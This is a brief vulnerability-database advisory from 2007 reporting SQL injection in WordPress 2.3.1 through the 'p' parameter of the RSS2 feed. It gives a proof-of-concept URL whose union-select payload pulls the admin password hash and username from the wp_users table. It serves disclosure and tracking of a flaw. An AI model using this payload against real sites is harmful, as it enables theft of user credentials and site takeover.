Sql Injection in wordpress 2.3.1

2007-12-05T00:00:00
ID SECURITYVULNS:DOC:18563
Type securityvulns
Reporter Securityvulns
Modified 2007-12-05T00:00:00

Description

Author : Beenu Arora

Mail : beenudel1986@gmail.com

Application : WordPress (2.3.1)

Homepage: http://wordpress.org/

~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~

Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=

Parameter : P

POC = http://localhost/path_to_wordpress/?feed=rss2&p=11//union//select//concat(user_password,char(100),username),2//from//wp_users//where/*/user_id=1/

Greetz to : d3 , baltazar , Icqbomber , Vivek , Zugzwang